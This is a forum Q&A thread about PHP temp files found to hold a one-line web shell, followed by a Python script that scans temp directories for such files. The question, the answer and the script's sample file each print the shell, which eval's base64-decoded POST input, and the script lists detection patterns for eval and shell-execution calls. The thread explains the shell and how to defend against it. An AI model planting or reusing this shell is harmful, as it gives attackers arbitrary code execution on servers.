PHP code contained in phpXXXX.tmp files in temp directory

Tags:

security

php

temp

I have noticed that our temp directory has a number of what appear to be temporary files with names like phpA3F9.tmp.

Looking into the contents, I find a number followed by some PHP code; the following code appears in several files:

    9990000
    <?php
    $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>

This appears to be an attack attempt, but I presume it relies on the attacker being able to execute the code in the tmp folder.

Can anybody explain what is going on here? What are the risks? How do these files get into the tmp folder? And how do I stop them?

I don't know if it is relevant, but we are running PHP 5.5 on IIS.

911 likes
Asked by Mark_1 on Dec 01 '15 14:12



1 Answer

Short story: your server may have already been compromised.

Those are PHP shells - mostly harmless where they are, but if they get into your web root, they'll allow an attacker to execute any arbitrary code on your server.

The key parts to understanding the shell are:

    $xsser=base64_decode($_POST['z0']);
    @eval("\$safedg = $xsser;");

It accepts any code at all from a $_POST variable, base64_decodes it, and then runs it through eval while suppressing any errors.

It's possible that they're being uploaded through a form on your site, and getting dumped in the temp folder as an intermediate step, with the hope that they would get moved into a web-accessible location. The other option is that there's already a shell or rootkit on your server, and it's putting those files in any writable folders that it can find.

So what to do about it? Check your server logs - if you see any successful connections to a script that you don't recognize, you may be compromised. Look for any upload forms on your site, and lock them down (require user authentication, etc.), and then if you're certain that you're compromised, don't bother trying to clean it. Spin up a new server, migrate your clean code, important files, and data to the clean server.

133 likes
Answered by samlev on Oct 17 '22 11:10
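The answer above recommends finding out which temp files are really dropped shells rather than ordinary upload leftovers. The following Python script is an added example, not code from the question, the answer, or PHP itself. It walks a directory, keeps only files matching the phpXXXX.tmp naming scheme from the question, and reports those whose contents show several of the markers visible in the posted shell (a PHP open tag, eval, base64_decode, request input, an error-suppressed call). The directory layout and the three sample files are constructed here so the script runs offline; the indicator list and the two-marker threshold are assumptions chosen for this example, not a PHP or IIS setting.

```python
"""
Scan a temp directory for PHP upload leftovers (phpXXXX.tmp) that carry
webshell markers such as eval(base64_decode($_POST[...])).
The sample directory is constructed inline so the script runs offline.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# Filename shape from the question: "php", four hex digits, ".tmp".
TMP_NAME = re.compile(r"^php[0-9A-Fa-f]{4}\.tmp$", re.IGNORECASE)

# Markers taken from the posted shell, written as loose regexes so small
# variants (extra spaces, $_GET instead of $_POST) are also matched.
# Assumed list for this example; extend it for your own environment.
INDICATORS = [
    ("php_open_tag", re.compile(rb"<\?php|<\?=")),
    ("eval", re.compile(rb"\beval\s*\(")),
    ("base64_decode", re.compile(rb"\bbase64_decode\s*\(")),
    ("request_input", re.compile(rb"\$_(POST|GET|REQUEST|COOKIE)\s*\[")),
    ("error_suppressed_call", re.compile(rb"@\s*(eval|assert|system|exec|shell_exec|passthru)\b")),
]


@dataclass
class Finding:
    path: str
    size: int
    indicators: list


def scan_file(path, max_bytes=65536):
    """Return the indicator labels found in the first max_bytes of a file."""
    with open(path, "rb") as fh:
        data = fh.read(max_bytes)
    return [label for label, rx in INDICATORS if rx.search(data)]


def scan_temp_dir(directory, min_indicators=2):
    """Return Findings for php*.tmp files showing at least min_indicators markers.

    A lone '<?php' may be a legitimately uploaded source file, so a file is
    only reported when several markers co-occur (default threshold: two).
    """
    findings = []
    for name in sorted(os.listdir(directory)):
        if not TMP_NAME.match(name):
            continue
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        hits = scan_file(path)
        if len(hits) >= min_indicators:
            findings.append(Finding(path=path, size=os.path.getsize(path), indicators=hits))
    return findings


def build_sample_dir():
    """Create a constructed temp directory: one shell-like file, two benign ones."""
    d = tempfile.mkdtemp(prefix="phpscan_")
    # Same shape as the question describes: a number, then the one-line shell.
    shell = (b"9990000\n<?php \n    $mujj = $_POST['z']; if ($mujj!=\"\") { "
             b"$xsser=base64_decode($_POST['z0']); @eval(\"\\$safedg = $xsser;\"); } ?>\n")
    with open(os.path.join(d, "phpA3F9.tmp"), "wb") as fh:
        fh.write(shell)
    # Ordinary upload leftover: a PNG header and padding, no PHP at all.
    with open(os.path.join(d, "php1B2C.tmp"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 64)
    # PHP source with a single marker (the open tag): below the threshold.
    with open(os.path.join(d, "phpFFFF.tmp"), "wb") as fh:
        fh.write(b"<?php echo 'hello'; ?>\n")
    return d


if __name__ == "__main__":
    sample = build_sample_dir()
    for f in scan_temp_dir(sample):
        print(f"{f.path} ({f.size} bytes): {', '.join(f.indicators)}")
```

Point `scan_temp_dir` at the real temp directory from php.ini (`upload_tmp_dir`, or the system temp path when it is unset) and review each reported file together with the web server access log for the POST that produced it; the threshold keeps an uploaded .php source from being flagged on the open tag alone.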